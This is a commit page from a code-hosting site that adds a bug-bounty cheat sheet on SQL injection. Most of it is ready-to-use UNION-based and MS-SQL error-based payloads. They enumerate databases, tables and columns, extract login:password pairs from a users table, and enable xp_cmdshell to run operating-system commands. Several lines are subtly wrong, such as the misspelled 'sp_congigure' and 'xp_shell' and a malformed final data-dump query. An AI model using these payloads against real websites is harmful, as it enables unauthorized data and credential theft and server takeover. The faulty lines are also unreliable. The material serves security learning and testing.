crash.software
Projects
Pull Requests
Issues
Builds
AllAboutBugBounty
Code
Files
Commits
Branches
Tags
Pull Requests
Code Comments
Code Compare
Issues
Builds
Statistics
Child Projects
cra.sh
RESTful API
Projects STRLCPY AllAboutBugBounty Commits e88ce7f0
🤬
  • ■ ■ ■ ■ ■ ■
    SQL Injection.md
    1  -# Soon!
     1 +# SQL injection
     2 + 
     3 +## Introduction
     4 + 
     5 + It is an attack in which an attacker inserts untrusted data in the application that results in revealing sensitive information of the database.
     6 + 
     7 + SQL Injection (SQLi) is a code injection attack where an attacker manipulates the data being sent to the server to execute malicious SQL statements to control a web application’s database server, thereby accessing, modifying and deleting unauthorized data. This attack is mainly used to take over database servers.
     8 + 
     9 +- In-band SQLi (Classic SQLi)
     10 +- Error-based SQLi
     11 +- Union-based SQLi
     12 +- Inferential SQLi (Blind SQLi)
     13 +- Boolean-based (content-based) Blind SQLi
     14 +- Time-based Blind SQLi
     15 +- Out-of-band SQLi
     16 + 
     17 +## How to exploit
     18 +# SQLI tricks
     19 + 
     20 +## GET
     21 + 
     22 +### Error-Based
     23 + 
     24 +### Simple test
     25 + 
     26 +`Adding a simpe quote '`
     27 + 
     28 +Example: `http://vulnerable-website.com/Less-1/?id=5'`
     29 + 
     30 +### Fuzzing
     31 + 
     32 +Sorting columns to find maximum column
     33 + 
     34 +`http://vulnerable-website.com/Less-1/?id=-1 order by 1`
     35 + 
     36 +`http://vulnerable-website.com/Less-1/?id=-1 order by 2`
     37 + 
     38 +`http://vulnerable-website.com/Less-1/?id=-1 order by 3`
     39 + 
     40 +(until it stop returning errors)
     41 + 
     42 +---
     43 + 
     44 + 
     45 +### Finding what column is injectable
     46 + 
     47 +**mysql**
     48 +`http://vulnerable-website.com/Less-1/?id=-1 union select 1, 2, 3` (using the same amount of columns you got on the previous step)
     49 + 
     50 +**postgresql**
     51 +`http://vulnerable-website.com/Less-1/?id=-1 union select NULL, NULL, NULL` (using the same amount of columns you got on the previous step)
     52 + 
     53 + one of the columns will be printed with the respective number
     54 + 
     55 +---
     56 + 
     57 + 
     58 +#### Finding version
     59 + 
     60 +`http://vulnerable-website.com/Less-1/?id=-1 union select 1, 2, version()` **mysql**
     61 +`http://vulnerable-website.com/Less-1/?id=-1 union select NULL, NULL, version()` **postgres**s
     62 + 
     63 + 
     64 +#### Finding database name
     65 + 
     66 +`http://vulnerable-website.com/Less-1/?id=-1 union select 1,2, database()` **mysql**
     67 + 
     68 +`http://vulnerable-website.com/Less-1/?id=-1 union select NULL,NULL, database()` **postgres**
     69 + 
     70 + 
     71 +#### Finding usernames logged in
     72 + 
     73 +`http://vulnerable-website.com/Less-1/?id=-1 union select 1, 2, current_user()` **mysql**
     74 + 
     75 + 
     76 +#### Finding databases
     77 + 
     78 +`http://vulnerable-website.com/Less-1/?id=-1 union select 1, 2, schema_name from information_schema.schemata` **mysql**
     79 + 
     80 +`http://vulnerable-website.com/Less-1/?id=-1 union select 1, 2, datname from pg_database` **postgres**
     81 + 
     82 + 
     83 +#### Finding table names from a database
     84 + 
     85 +`http://vulnerable-website.com/Less-1/?id=-1 union select 1, 2, table_name from information_schema.tables where table_schema="database_name"` **mysql**
     86 + 
     87 +`http://vulnerable-website.com/Less-1/?id=-1 union select 1, 2, tablename from pg_tables where table_catalog="database_name"` **postgres**
     88 + 
     89 + 
     90 +#### Finding column names from a table
     91 + 
     92 +`http://vulnerable-website.com/Less-1/?id=-1 union select 1, 2, column_name from information_schema.columns where table_schema="database_name" and table_name="tablename"` **mysql**
     93 + 
     94 +`http://vulnerable-website.com/Less-1/?id=-1 union select 1, 2, column_name from information_schema.columns where table_catalog="database_name" and table_name="tablename"` **postgres**
     95 + 
     96 +#### Concatenate
     97 + 
     98 +Example:
     99 + 
     100 +`http://vulnerable-website.com/Less-1/?id=-1 union select 1, 2, login from users;`
     101 +`http://vulnerable-website.com/Less-1/?id=-1 union select 1, 2, password from users;`
     102 + 
     103 +in one query
     104 + 
     105 +`http://vulnerable-website.com/Less-1/?id=-1 union select 1, 2, concat(login,':',password) from users;` **mysql**
     106 +`http://vulnerable-website.com/Less-1/?id=-1 union select 1, 2, login||':'||password from users;` **postgres**
     107 + 
     108 + 
     109 +### Error Based SQLI (USUALLY MS-SQL)
     110 + 
     111 +#### Current user
     112 + 
     113 +`http://vulnerable-website.com/Less-1/?id=-1 or 1 in (SELECT TOP 1 CAST(user_name() as varchar(4096)))--`
     114 + 
     115 + 
     116 +#### DBMS version
     117 + 
     118 +`http://vulnerable-website.com/Less-1/?id=-1 or 1 in (SELECT TOP 1 CAST(@@version as varchar(4096)))--`
     119 + 
     120 + 
     121 +#### Database name
     122 + 
     123 +`http://vulnerable-website.com/Less-1/?id=-1 or db_name(0)=0 --`
     124 + 
     125 + 
     126 +#### Tables from a database
     127 + 
     128 +`http://vulnerable-website.com/Less-1/?id=-1 or 1 in (SELECT TOP 1 CAST(name as varchar(4096)) FROM dbname..sysobjects where xtype='U')--`
     129 + 
     130 +---
     131 + 
     132 +`http://vulnerable-website.com/Less-1/?id=-1 or 1 in (SELECT TOP 1 CAST(name as varchar(4096)) FROM dbname..sysobjects where xtype='U' AND name NOT IN ('previouslyFoundTable',...))--`
     133 + 
     134 + 
     135 +#### Columns within a table
     136 + 
     137 + 
     138 +`http://vulnerable-website.com/Less-1/?id=-1 or 1 in (SELECT TOP 1 CAST(dbname..syscolumns.name as varchar(4096)) FROM dbname..syscolumns, dbname..sysobjects WHERE dbname..syscolumns.id=dbname..sysobjects.id AND dbname..sysobjects.name = 'tablename')--`
     139 + 
     140 +> remember to change **dbname** and **tablename** accordingly with the given situation
     141 +> after each iteration a new column name will be found, make sure add it to ** previously found column name ** separated by comma as on the next sample
     142 + 
     143 +`http://vulnerable-website.com/Less-1/?id=-1 or 1 in (SELECT TOP 1 CAST(dbname..syscolumns.name as varchar(4096)) FROM dbname..syscolumns, dbname..sysobjects WHERE dbname..syscolumns.id=dbname..sysobjects.id AND dbname..sysobjects.name = 'tablename' AND dbname..syscolumns.name NOT IN('previously found column name', ...))--`
     144 + 
     145 + 
     146 +#### Actual data
     147 + 
     148 + 
     149 +`http://vulnerable-website.com/Less-1/?id=-1 or 1 in (SELECT TOP 1 CAST(columnName as varchar(4096)) FROM tablename)--`
     150 + 
     151 +> after each iteration a new column name will be found, make sure add it to ** previously found column name ** separated by comma as on the next sample
     152 + 
     153 +`http://vulnerable-website.com/Less-1/?id=-1 or 1 in (SELECT TOP 1 CAST(columnName as varchar(4096)) FROM tablename AND name NOT IN('previously found row data'))--`
     154 + 
     155 + 
     156 +#### Shell commands
     157 + 
     158 +`EXEC master..xp_cmdshell <command>`
     159 + 
     160 +> you need yo be 'sa' user
     161 + 
     162 +#### Enabling shell commands
     163 + 
     164 +`EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_congigure 'xp_shell', 1; RECONFIGURE;`
     165 + 
Please wait...
Page is in error, reload to recover